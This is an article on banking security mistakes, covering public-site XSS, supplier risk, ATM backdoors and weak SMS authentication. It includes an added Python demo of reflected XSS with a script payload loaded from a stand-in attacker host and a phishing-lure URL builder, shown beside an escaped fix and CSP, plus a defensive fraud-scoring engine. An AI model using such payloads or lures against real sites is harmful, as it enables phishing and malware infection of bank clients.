IT Security Guru

Practical Risks and Real Remedies in E-Banking: the biggest mistakes banks make in defending against hackers

by The Gurus
June 11, 2015
in This Week's Gurus

By Ilia Kolochenko, CEO of High-Tech Bridge

Risk assessment needs to be comprehensive and global

Many financial institutions fail to perform comprehensive risk analysis and assessment, exposing themselves and their clients to enormous risk. For example, many banks underestimate or even ignore the security of their public websites, focusing instead on “more sensitive” web applications such as e-banking. This is a mistake: even if the bank’s website holds no financial data, it is a perfect target for cybercriminals. A medium-risk Cross-Site Scripting (XSS) vulnerability on the public website is enough to run a spear-phishing campaign against the bank’s clients, because the malicious link carries the bank’s own domain name, and it can be used to infect their PCs or mobile devices with a Trojan when they visit the bank’s site.
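As an added example (not part of the article, and not High-Tech Bridge’s code), here is how a reflected XSS in the search page of a hypothetical bank marketing site becomes a phishing lure on the bank’s own hostname, shown beside the encoded version of the same page. The hostname, the /search endpoint, the payload and the security header are all constructed for illustration.

```python
import html
from urllib.parse import urlencode

# Hypothetical public (non-e-banking) bank site; constructed for this example.
BANK_HOST = "www.example-bank.test"

def render_search_vulnerable(query: str) -> str:
    """Reflects the raw query into the page: a reflected XSS sink."""
    return f"<h1>Search results for: {query}</h1>"

def render_search_fixed(query: str) -> str:
    """Same page with the query encoded for the HTML text context.
    (Other contexts, such as attributes or JavaScript, need their own encoding.)"""
    return f"<h1>Search results for: {html.escape(query, quote=True)}</h1>"

def security_headers() -> dict:
    """Defence in depth: a CSP that refuses scripts from any third-party host,
    so an external script injected through an encoding slip still does not run."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'"}

def lure_url(payload: str) -> str:
    """The link a spear-phishing mail would carry. It points at the bank's real
    hostname, which is exactly why a client would trust it."""
    return f"https://{BANK_HOST}/search?{urlencode({'q': payload})}"

def reflects_markup(rendered: str, payload: str) -> bool:
    """True if the payload survived into the HTML as live markup."""
    return payload in rendered

# Constructed payload: loads a script from an attacker-controlled host.
# In a real campaign that script would push an exploit kit or a banking Trojan.
PAYLOAD = '<script src="https://attacker.test/drop.js"></script>'

def demo() -> dict:
    """Run both renderers against the payload and report what each does."""
    return {
        "lure": lure_url(PAYLOAD),
        "vulnerable_reflects": reflects_markup(render_search_vulnerable(PAYLOAD), PAYLOAD),
        "fixed_reflects": reflects_markup(render_search_fixed(PAYLOAD), PAYLOAD),
        "fixed_html": render_search_fixed(PAYLOAD),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The lure never touches e-banking at all; it only needs the marketing site to reflect untrusted input, which is why the public website belongs in the same risk assessment as the transactional applications.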
Outsourcing, external backup, and cloud services are another problem. Many financial institutions ignore the fact that their IT supplier has privileged access to the bank’s financial records, and at the same time take no interest in that supplier’s own internal information security. Hackers would obviously rather compromise a negligent IT supplier and obtain everything they need through it than mount an expensive APT against the bank itself. “Secure” outsourcing of backups and use of the cloud have become very popular. Keep in mind that if a third-party provider transmitting, hosting, or processing your data is hacked, you are hacked as well.
ATMs are being compromised and hacked too. For example, a backdoor can make the ATM dispense all of its cash when a secret key combination is entered instead of a PIN. Did you include ATM protection in your cybersecurity plan, or are your ATMs still running Windows XP and connected to the Internet?

End-users of e-banking shall be regarded as already compromised

Despite all the efforts of the antivirus industry, hackers are still more sophisticated than the security software. Kaspersky itself recently announced that it had been hacked and infected with very complex and stealthy malware. Almost any security mechanism of an e-banking solution implemented on the client side can be bypassed if the client’s computer is compromised: one-time passwords, two-factor authentication, and all other modern controls will fail if the client’s machine is hacked. Combine a small vulnerability on the bank website overlooked by the security team with uneducated users and smart hackers, and a client will be hacked; it is just a question of time.
Therefore, make sure you have implemented strict monitoring that notifies your fraud prevention team about any abnormal activity and blocks or pauses suspicious money transfers. Notifying the client through an external channel, such as an SMS or a phone call, about any potentially suspicious activity on his or her account can prevent many fraudulent transactions just in time. Every minute counts when stopping an illegal transaction; otherwise the money leaves the account and you will never see it again.
Every user of e-banking should be considered hacked and compromised. In this area, paranoia is cheaper for the business than negligence.
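The monitoring this section calls for can be expressed as a small rule engine on the bank’s side, where the client endpoint is assumed to be hostile. The following is an added example, not code from the article or from High-Tech Bridge; the risk rules, thresholds, client profile and sample transfers are all constructed, and the IBANs are the published example IBANs rather than real accounts. The drained-account case deliberately comes from a known device in the home country, because that is exactly what a Trojan on the client’s own PC looks like to the bank.

```python
from dataclasses import dataclass, field, replace
from datetime import datetime, timedelta
from typing import List, Set, Tuple

@dataclass
class Transfer:
    payee_iban: str
    amount: float
    at: datetime
    device_id: str   # fingerprint of the browser/app session
    country: str     # geolocation of the session's source address

@dataclass
class Profile:
    known_payees: Set[str]
    known_devices: Set[str]
    home_country: str
    typical_amount: float          # e.g. the client's 90th-percentile transfer
    history: List[Transfer] = field(default_factory=list)  # earlier transfers today

HOLD = "HOLD_AND_ALERT"        # pause the transfer, page the fraud team, call the client
NOTIFY = "NOTIFY_OUT_OF_BAND"  # let it proceed, but SMS/phone the client immediately
ALLOW = "ALLOW"

def risk_score(t: Transfer, p: Profile) -> Tuple[int, List[str]]:
    """Additive rule score; every rule records a reason for the analyst."""
    score, reasons = 0, []
    if t.payee_iban not in p.known_payees:
        score += 2; reasons.append("first transfer to this payee")
    if t.device_id not in p.known_devices:
        score += 2; reasons.append("unknown device")
    if t.country != p.home_country:
        score += 1; reasons.append(f"session from {t.country}")
    if t.amount > 3 * p.typical_amount:
        score += 2; reasons.append("amount far above the client's baseline")
    recent = [h for h in p.history
              if timedelta(0) <= t.at - h.at <= timedelta(minutes=10)]
    if len(recent) >= 2:
        score += 2; reasons.append(f"{len(recent) + 1} transfers within 10 minutes")
    return score, reasons

def decide(score: int) -> str:
    """Three tiers: block and alert, proceed but tell the client out of band, or allow."""
    if score >= 5:
        return HOLD
    if score >= 3:
        return NOTIFY
    return ALLOW

def evaluate(t: Transfer, p: Profile) -> dict:
    score, reasons = risk_score(t, p)
    return {"action": decide(score), "score": score, "reasons": reasons}

# Constructed sample data.
T0 = datetime(2015, 6, 11, 9, 0)
CLIENT = Profile(
    known_payees={"CH9300762011623852957"},
    known_devices={"laptop-7f3a"},
    home_country="CH",
    typical_amount=800.0,
)
# Routine payment to a known payee from the usual laptop at home.
RENT = Transfer("CH9300762011623852957", 650.0, T0, "laptop-7f3a", "CH")
# New payee while abroad: worth an SMS, not a block.
HOLIDAY = Transfer("DE89370400440532013000", 300.0, T0, "laptop-7f3a", "FR")
# Trojan on the client's own laptop: same device, same country, but a new payee,
# an outsized amount, and a burst of transfers a few minutes apart.
CLIENT_AFTER_BURST = replace(CLIENT, history=[
    Transfer("DE89370400440532013000", 2400.0, T0 + timedelta(minutes=1), "laptop-7f3a", "CH"),
    Transfer("DE89370400440532013000", 2400.0, T0 + timedelta(minutes=3), "laptop-7f3a", "CH"),
])
DRAIN = Transfer("DE89370400440532013000", 4000.0, T0 + timedelta(minutes=5), "laptop-7f3a", "CH")

if __name__ == "__main__":
    for name, t, p in [("rent", RENT, CLIENT), ("holiday", HOLIDAY, CLIENT),
                       ("drain", DRAIN, CLIENT_AFTER_BURST)]:
        print(name, evaluate(t, p))
```

The decision tiers matter as much as the rules: a HOLD keeps the money in the account while the fraud team works, and a NOTIFY goes to the client’s registered phone rather than back into the possibly compromised session, so the client learns of the activity through a channel the attacker does not control.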

Strong authentication should be implemented properly

Two-Factor Authentication (2FA) and One-Time Passwords (OTP) can do harm if implemented wrongly. I know a bank that replaced old-fashioned scratch cards with more “modern” notification by SMS for its mobile banking solution. The problem was that the card was usually stored separately from the mobile phone, so in case of a robbery the criminals could not access your bank account. With this security upgrade, however, it became enough to steal your mobile phone to get unlimited access to your bank account!
Therefore, when you implement new security solutions, make sure they are appropriate for your business environment; otherwise you are just harming your business.

Cybersecurity solutions need to be both efficient and effective

Many financial organizations spend huge amounts on cybersecurity solutions without analyzing whether those solutions are effective, necessary, appropriate, and compatible with their particular business environment and business needs.
I have seen small organizations that spent hundreds of thousands of dollars on expensive Data Leakage Prevention (DLP) solutions while leaving their front-end applications, with critical data, unprotected, just because security vendors showed them a Gartner report saying that 90% of threats come from insiders.
Another common case is expensive security solutions purchased for the sake of compliance, or ordered directly by management frightened by cybersecurity media hype. Because of the complexity of configuring and managing them, those expensive boxes were left by IT teams in their default configuration, leaving the corporate infrastructure as vulnerable as if they did not exist. Remember, spending a lot on IT security does not mean spending wisely.

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic
